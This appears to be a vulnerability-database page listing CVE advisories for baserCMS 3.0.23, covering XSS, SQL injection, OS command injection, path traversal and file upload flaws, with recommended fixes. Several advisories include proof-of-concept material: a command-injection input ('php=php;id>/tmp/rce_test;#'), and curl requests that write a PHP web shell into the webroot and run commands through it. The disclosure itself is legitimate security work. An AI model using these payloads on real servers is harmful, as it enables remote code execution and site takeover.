Search for packages
| purl | pkg:composer/baserproject/basercms@3.0.23 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-3new-f12y-8bf9
Aliases: CVE-2025-32957 GHSA-hv78-cwp4-8r7r |
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE) ### Details The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included. Vector: Malicious ZIP upload + insecure `require_once` ### PoC 1. Restore backup  1. Load file shell (insecure `require_once`)   ### Impact Remote Code Execution (RCE) |
Affected by 0 other vulnerabilities. |
|
VCID-4zw8-truk-pugf
Aliases: CVE-2026-21861 GHSA-qxmc-6f24-g86g |
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE) ## Summary In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**. This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**. --- ## Vulnerability Information | Item | Details | | ---- | ------- | | CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command | | Impact | Remote Code Execution (RCE) | | Severity | Critical | | Attack Requirements | Administrator privileges required | | Reproducibility | Reproducible (confirmed multiple times) | | Test Environment | baserCMS 5.2.2 (Docker / development environment) | --- ## Affected Areas - **Controller** - `PluginsController::get_core_update()` - **Service** - `PluginsService::getCoreUpdate()` - **Affected Endpoint** - `/baser/admin/baser-core/plugins/get_core_update` --- ## Technical Details ### Vulnerable Code Flow ```text PluginsController::get_core_update() ↓ Retrieves php parameter from POST data PluginsService::getCoreUpdate($targetVersion, $php, $force) ↓ Concatenates $php into command string without validation or escaping exec($command) ``` ### Relevant Code (Excerpt) **PluginsController.php** ```php $service->getCoreUpdate( $request->getData('targetVersion') ?? '', $request->getData('php') ?? 'php', $request->getData('force'), ); ``` **PluginsService.php** ```php $command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' . $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update'; exec($command, $out, $code); ``` The `$php` parameter is user input, and **none** of the following countermeasures are in place: - Restriction via allowlist - Validation via regular expression - Escaping via `escapeshellarg()` or similar --- ## Attack Scenario 1. The attacker logs in as a CMS administrator 2. Sends a POST request to the core update functionality in the admin panel 3. Specifies a string containing OS commands in the `php` parameter 4. `exec()` is executed on the server side, running the arbitrary OS command ### Example Attack Input (Conceptual) ```text php=php;id>/tmp/rce_test;# ``` --- ## Verification Results (PoC) ### Execution Result ```bash $ docker exec bc-php cat /tmp/rce_test uid=1000(www-data) gid=1000(www-data) groups=1000(www-data) ``` The above confirms that OS commands can be executed with `www-data` privileges. ### Additional Notes - Reproducible through the legitimate flow in the admin panel (browser) - Succeeds even with CSRF/FormProtection tokens included in a legitimate request - Failure cases (400/403) have also been investigated and differentiated - Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens) --- ## Impact If this vulnerability is exploited, the following becomes possible: - Retrieval of server information - Reading/writing arbitrary files - Retrieval of application configuration information (DB credentials, etc.) - OS-level operations beyond application permission boundaries Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant. --- ## Recommended Fix ### Primary Recommendation - Do not accept the PHP executable path from user input - Fix the PHP executable on the server side using the `PHP_BINARY` constant ```php $php = escapeshellarg(PHP_BINARY); ``` ### Supplementary Fix Recommendations - Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well - If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.) ### Alternative (Not Recommended) - Allowlist validation for the PHP executable path - Combined use of regex validation and `escapeshellarg()` However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**. --- ## Additional Notes - This issue is independent of UI display controls (showing/hiding buttons) - As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed - This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone --- ## Conclusion Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended. This advisory was translated from Japanese to English using GitHub Copilot. |
Affected by 0 other vulnerabilities. |
|
VCID-7x3n-4c2b-nfbx
Aliases: CVE-2026-30880 GHSA-6hpg-8rx3-cwgv |
baserCMS has OS command injection vulnerability in installer baserCMS has an OS command injection vulnerability in the installer. ### Target baserCMS 5.2.2 and earlier versions ### Vulnerability If baserCMS is placed on a server but not installed, malicious commands may be executed. ### Countermeasures Update to the latest version of baserCMS Please refer to the following page to reference for more information. https://basercms.net/security/JVN_54513170 ### Credits REN XINGDIAN |
Affected by 0 other vulnerabilities. |
|
VCID-8buz-nsr9-3yge
Aliases: CVE-2026-30940 GHSA-c5c6-37vq-pjcq |
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API ## Summary A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write. An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE). ## Affected Code **File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php` ```php public function getFullpath(string $theme, string $plugin, string $type, string $path) { // ... return $viewPath . $type . DS . $path; // $path is not sanitized } ``` ## Attack Scenario 1. The attacker compromises an administrator account (password leak, brute force, etc.) 2. Obtains an access token via API login 3. Specifies `path: "../../../../webroot/"` in the theme file creation API 4. A PHP file is created in the webroot 5. The attacker accesses the created PHP file to achieve RCE ## Reproduction Steps ```bash # 1. Login curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \ -H "Content-Type: application/json" \ -d '{"email":"admin@example.com","password":"password"}' # 2. Create webshell curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \ -H "Authorization: Bearer <token>" \ -H "Content-Type: application/json" \ -d '{ "theme": "BcThemeSample", "plugin": "", "type": "layout", "path": "../../../../webroot/", "base_name": "shell", "ext": "php", "contents": "<?php system($_GET[\"cmd\"]); ?>" }' # 3. RCE curl "http://target/shell.php?cmd=id" ``` ## Vulnerability Details | Item | Details | |------|---------| | CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path | | Impact | Arbitrary file write, Remote Code Execution (RCE) | | Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. | | Reproducibility | High (PoC verified) | | Test Environment | baserCMS 5.x (Docker environment) | ### Additional Notes on Attack Prerequisites - **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible. - **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required. ## Recommended Fix Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected. The specific implementation location and method are left to the project's design decisions. ## Comparison with Other CMS WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename. This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)." ## Resources - OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal> - WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/> - Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167> This advisory was translated from Japanese to English using GitHub Copilot. |
Affected by 0 other vulnerabilities. |
|
VCID-8ssu-umet-37bk
Aliases: CVE-2026-32734 GHSA-677c-xv24-crgx |
baserCMS is Vulnerable to Cross-site Scripting baserCMS has DOM-based cross-site scripting in tag creation. ### Target baserCMS 5.2.2 and earlier versions ### Vulnerability Malicious JavaScript may be executed when creating a tag. ### Countermeasures Update to the latest version of baserCMS Please refer to the following page to reference for more information. https://basercms.net/security/JVN_94952030 ### Credits - quanlna2 (Le Nguyen Anh Quan) - namdi (Do Ich Nam) - minhnn42 (Nguyen Ngoc Minh) - VCSLab - Viettel Cyber Security |
Affected by 0 other vulnerabilities. |
|
VCID-d1sf-cmct-zbh1
Aliases: CVE-2026-30878 GHSA-8cr7-r8qw-gp3c |
baserCMS has Mail Form Acceptance Bypass via Public API ### Summary A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API. ### Details In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window). These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()` (e.g. `plugins/bc-mail/src/Controller/MailController.php`). However, the public API endpoint: `plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()` does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state. The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI. ### PoC 1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed). 2. Obtain a CSRF cookie by accessing the site root: ``` curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/' ``` 3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint: ``` curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://localhost/' -H 'X-CSRF-Token: <csrf-token-from-cookie>' -b /tmp/basercms_cookies.txt --data-urlencode 'name_1=Test' --data-urlencode 'name_2=User' --data-urlencode 'email_1=test@example.com' --data-urlencode 'email_2=test@example.com' --data-urlencode 'category[]=資料請求' --data-urlencode 'root=検索エンジン' --data-urlencode 'message=API bypass test' ``` 4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions. ### Impact This is an access control / business logic bypass vulnerability. Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption. |
Affected by 0 other vulnerabilities. |
|
VCID-g56w-z9cx-5ygv
Aliases: CVE-2023-29009 GHSA-8vqx-prq4-rqrq |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms. |
Affected by 16 other vulnerabilities. Affected by 16 other vulnerabilities. |
|
VCID-ggv8-3v9t-mfea
Aliases: CVE-2023-44379 GHSA-66c2-p8rh-qx87 |
baserCMS Cross-site Scripting vulnerability in Site search Feature There is a XSS Vulnerability in Site search Feature to baserCMS. |
Affected by 13 other vulnerabilities. |
|
VCID-j37y-gws9-ake9
Aliases: CVE-2023-25654 GHSA-h4cc-fxpp-pgw9 |
Unrestricted Upload of File with Dangerous Type baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch. |
Affected by 21 other vulnerabilities. |
|
VCID-jby7-s5ez-dqb3
Aliases: CVE-2023-43649 GHSA-fw9x-cqjq-7jx5 |
Cross-Site Request Forgery (CSRF) in baserproject/basercms. |
Affected by 16 other vulnerabilities. Affected by 13 other vulnerabilities. |
|
VCID-k5qv-4yp3-zbgf
Aliases: CVE-2026-27697 GHSA-vh89-rjph-2g7p |
baserCMS has an SQL injection vulnerability in its blog post functionality baserCMS has a SQL injection vulnerability in blog posts. ### Target baserCMS 5.2.2 and earlier versions ### Vulnerability Malicious SQL may be executed in blog posts. ### Countermeasures Update to the latest version of baserCMS Please refer to the following page to reference for more information. https://basercms.net/security/JVN_52157568 ### Credits Mirai Matsumoto@Future Secure Wave, Inc. |
Affected by 0 other vulnerabilities. |
|
VCID-khft-xvrw-g3dr
Aliases: CVE-2024-46995 GHSA-mr7q-fv7j-jcgv |
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request XSS vulnerability in HTTP 400 Bad Request to baserCMS. |
Affected by 9 other vulnerabilities. |
|
VCID-mfm9-gsh3-ubg8
Aliases: CVE-2024-46996 GHSA-66jv-qrm3-vvfg |
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature XSS vulnerability in Blog posts feature to baserCMS. |
Affected by 9 other vulnerabilities. |
|
VCID-nxrf-64er-xbfx
Aliases: CVE-2024-26128 GHSA-jjxq-m8h3-4vw5 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability. |
Affected by 13 other vulnerabilities. |
|
VCID-p695-t9ye-v3ga
Aliases: CVE-2024-46998 GHSA-p3m2-mj3j-j49x |
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature XSS vulnerability in Edit Email Form Settings Feature to baserCMS. |
Affected by 9 other vulnerabilities. |
|
VCID-pd8c-9d7z-zkhg
Aliases: CVE-2023-43647 GHSA-ggj4-78rm-6xgv |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms. |
Affected by 16 other vulnerabilities. Affected by 13 other vulnerabilities. |
|
VCID-sqr4-v889-tff8
Aliases: CVE-2024-46994 GHSA-wrjc-fmfq-w3jr |
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature XSS vulnerability in Blog posts and Contents list Feature to baserCMS. |
Affected by 9 other vulnerabilities. |
|
VCID-u16w-rbuk-ybfs
Aliases: CVE-2023-43648 GHSA-hmqj-gv2m-hq55 |
baserCMS Directory Traversal vulnerability in Form submission data management Feature There is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible. ### Target baserCMS 4.7.8 and earlier versions ### Vulnerability There is a possibility that information on the server may be obtained by a user who is logged in to the management screen. ### Countermeasures Update to the latest version of baserCMS Please refer to the following page to reference for more information. https://basercms.net/security/JVN_45547161 ### Credits Shiga Takuma@BroadBand Security, Inc |
Affected by 16 other vulnerabilities. Affected by 13 other vulnerabilities. |
|
VCID-uedz-j2vn-cbea
Aliases: CVE-2023-51450 GHSA-77fc-4cv5-hmfr |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability. |
Affected by 13 other vulnerabilities. |
|
VCID-y2sz-c6vb-pkdp
Aliases: CVE-2026-30877 GHSA-m9g7-rgfc-jcm7 |
baserCMS Update Functionality Vulnerable to OS Command Injection ### Summary The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality. Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS. ### Details Please refer to the attached materials. [OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf) ### Impact An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS. |
Affected by 0 other vulnerabilities. |
|
VCID-zqd4-rdem-jfgk
Aliases: CVE-2026-30879 GHSA-jmq3-x8q7-j9qm |
baserCMS has a cross-site scripting vulnerability in blog posts. ### Target baserCMS 5.2.1 and earlier versions ### Vulnerability Malicious Javascript may be executed in blog posts. ### Countermeasures Update to the latest version of baserCMS Please refer to the following page to reference for more information. https://basercms.net/security/JVN_20837860 ### Credits Gai Tanaka@Mitsui Bussan Secure Directions, Inc. |
Affected by 0 other vulnerabilities. |
|
VCID-zsgc-fnen-b7a6
Aliases: CVE-2023-25655 GHSA-mfvg-qwcw-qvc8 |
Unrestricted Upload of File with Dangerous Type baserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch. |
Affected by 21 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||